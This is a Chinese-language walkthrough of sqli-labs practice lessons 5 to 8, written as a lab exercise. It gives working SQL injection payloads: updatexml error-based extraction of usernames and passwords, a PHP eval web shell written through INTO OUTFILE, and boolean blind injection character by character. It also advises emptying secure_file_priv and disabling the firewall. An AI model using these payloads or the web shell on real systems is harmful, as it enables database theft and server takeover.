Less-5
上来先进行查看是否有注入点,判断闭合方式,查询数据列数,用union联合注入查看回显位,发现到这一步的时候,和前四道题不太一样了,竟然没有回显位???
我们看一下源码,发现源码和前几道题有点差异,我们尝试**报错注入,**让页面回显对数据库的报错信息,报错注入有很多,例如floor,updatexml等等,我们这里用updatexml报错注入试一试是否可行!!!
我们简单说一下updatexml报错注入
1.updatexml函数格式为updatexml(xml_doument,XPath_string,new_value);
所以说这里我们需要认识到它三个参数的含义是什么?
1、第一个参数其实就是XML的内容
2、第二个参数就是需要更新update的位置XPATH路径
3、第三个参数就是更新之后的内容
所以第一和第三个参数可以随便写,只需要利用第二个参数,他会校验你输入的内容是否符合XPATH格式
我们使用 updatexml(1,concat(0x7e,(...),0x7e),1)
大家会很好奇 中间0x7e 是什么东西,++这个是因为0x7e是~,不属于xpath语法格式,因此报出xpath语法错误。如果不添加该不属于xpath格式的参数无法引发正确的报错。++
所以接下来按规矩办事,先查库,再查表,最后列
数据库名:
?id=0' and updatexml(1,concat(0x7e,database(),0x7e),1)--+
表名
?id=0' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)--+
列名:
?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+
注入:
?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password)from users),0x7e),1)--+
这里我们又看到查询回显内容很少,这里就因为updatexml报错最大只能容纳32个字节
我们使用limit分段回显 limit n,1
?id=1' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)--+
?id=1' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 1,1),0x7e),1)--+
........
Less-6
上来先进行查看是否有注入点,判断闭合方式,查询数据列数,用union联合注入查看回显位,发现到这一步的时候,和第五道题一样啊,只不过是闭合方式有改变,第六题的闭合方式是双引号"
那么解题步骤和第五题一样,直接演示最后一步
?id=1" and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password)from users),0x7e),1)--+
Less-7
上来先进行查看是否有注入点 直接?id=1,发现有显示outfile??这是什么,经过查询一下资料,原来这到题让写一个外部木马文件,我感觉第7题还是有点难度的,大家要是看不懂我写的,建议去b站看一下专业人士的视频讲解!!!
接下来判断闭合方式和回显位置,这些步骤就不演示啦
接下来开始写马,写马需要一个函数就是into outfile()函数,就是将外部文件写入
?id=1')) union select 1,"<?php eval($_POST[phpinfo()])?>" ,3 into outfile"F://phpstudt//phpstudy_pro//WWW//sqli-labs-php7-master//Less-7//shell.php"--+
into outfile后面的文件的路径根据自己电脑的路径自己写
注意:需要into outfile函数需要配置 mysql的 my.ini 文件!!!
在my.ini文件中修改secure_file_priv=""这个语句,要是没有这个语句,直接添加就好了!!!
secure_file_priv这个就是限制MYSQL对于文件的导入与导出,改为空就没事了
还有就是我执行操作的时候,一直没有成功写入,后来才发现是电脑防火墙把咱们写的一句话木马给删除了,该说不说,微软的防火墙是真的牛,大家可以把防火墙关闭,或者下载火绒安全,弄一个白名单(信任区),这样可以避免这样的麻烦(刚才真的困扰我好久)!!
成功!!!
Less-8
上来先进行查看是否有注入点,判断闭合方式,查询数据列数,用union联合注入查看回显位,发现到这一步的时候,和第五道题,第六题一样啊
让我看看题干有没有提示!
原来题干说了呀,是布尔盲注,我们就用布尔盲注解题吧!!!
那我们先介绍一下布尔盲注
length()函数 返回字符串的长度
substr()截取字符串 (语法:SUBSTR(str,pos,len);)
ascii()返回字符的ascii码值 (将字符变为数字)
开始解题
猜解库名长度
?id=1' and (length(database()))=8--+ (后面=8需要自己一个个试出来的)
利用ASCII码猜解当前数据库的名称,需要对照ASCII表一次查找!大家自行搜索一下
//security
substr(database(),1,1)) 第一个1是位数,第二个1是个数,所以之后改变第一个的数值就ok了,然后后面的值需要大家一步步尝试,这里就不演示啦
?id=1' and (ascii(substr(database(),1,1)))=115--+ >>>s
?id=1' and (ascii(substr(database(),2,1)))=101--+ >>>e
?id=1' and ascii(substr((database()),3,1)) = 99 --+ >>>c
?id=1' and (ascii(substr(database(),4,1)))=117--+ >>>u
?id=1' and (ascii(substr(database(),5,1)))=114--+ >>>r
?id=1' and ascii(substr((database()),6,1))=105--+ >>>i
?id=1' and (ascii(substr(database(),7,1)))=116--+ >>>t
?id=1' and (ascii(substr(database(),8,1)))=121--+ >>>y
。。。一个个去尝试找到一个8位的库名
猜表名
//emails
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) = 101 --+ >>>e
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1)) = 109 --+ >>>m
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1)) = 97 --+ >>>a
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1)) = 105 --+ >>>i
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),5,1)) = 108 --+ >>>l
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),6,1)) = 115 --+ >>>s
也是需要一步步尝试
猜字段
//id
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)) = 105 --+ >>>i
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),2,1)) = 100 --+ >>>d
//emali_id?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),1,1)) = 101 --+ >>>e
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),2,1)) = 109 --+ >>>m
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),3,1)) = 97 --+ >>>a
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),4,1)) = 105 --+ >>>i
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),5,1)) = 108 --+ >>>l
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),6,1)) = 95 --+ >>>_
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),7,1)) = 105 --+ >>>i
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),8,1)) = 100 --+ >>>d
获取数据
?id=1' and ascii(substr((select email_id from emails limit 0,1),1,1)) = 68 --+ >>>D
?id=1' and ascii(substr((select email_id from emails limit 0,1),2,1)) = 117 --+ >>>u
?id=1' and ascii(substr((select email_id from emails limit 0,1),3,1)) = 109 --+ >>>m
?id=1' and ascii(substr((select email_id from emails limit 0,1),4,1)) = 98 --+ >>>b
?id=1' and ascii(substr((select email_id from emails limit 0,1),5,1)) = 64 --+ >>>@
?id=1' and ascii(substr((select email_id from emails limit 0,1),6,1)) = 100 --+ >>>d
?id=1' and ascii(substr((select email_id from emails limit 0,1),7,1)) = 104 --+ >>>h
?id=1' and ascii(substr((select email_id from emails limit 0,1),8,1)) = 97 --+ >>>a
?id=1' and ascii(substr((select email_id from emails limit 0,1),9,1)) = 104 --+ >>>h
?id=1' and ascii(substr((select email_id from emails limit 0,1),10,1)) = 104 --+ >>>h
?id=1' and ascii(substr((select email_id from emails limit 0,1),11,1)) = 97 --+ >>>a
?id=1' and ascii(substr((select email_id from emails limit 0,1),12,1)) = 110 --+ >>>n
?id=1' and ascii(substr((select email_id from emails limit 0,1),13,1)) = 46 --+ >>>.
?id=1' and ascii(substr((select email_id from emails limit 0,1),14,1)) = 99 --+ >>>c
?id=1' and ascii(substr((select email_id from emails limit 0,1),15,1)) = 111 --+ >>>o
?id=1' and ascii(substr((select email_id from emails limit 0,1),16,1)) = 109 --+ >>>m
成功!!!